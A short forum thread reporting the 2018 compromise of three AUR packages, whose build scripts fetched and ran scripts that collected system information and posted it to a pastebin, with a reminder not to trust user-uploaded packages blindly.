For those not reading [aur-general], three AUR packages were found compromised (https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html): acroread, balz and minergate. Details of the malicious actions (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f167) reveal a build-time fetch and execution of 2 scripts (which affects all users) and the installation of a systemd service and timer (which doesn't affect Artix, obviously). The purpose thereof was to gather system information and post it to a pastebin.
Upon closer inspection, the installed script contains a typo which should prevent it from functioning as intended, but let this be a reminder for everyone not to blindly trust user-uploaded content. The good news is this was quickly discovered, reported and fixed.
I read this elsewhere, pleasing to see that this was picked up and dealt with in a timely manner.
FWIW - I read it on the arch subeddit on reddit
FWIW I read it in void forums first :)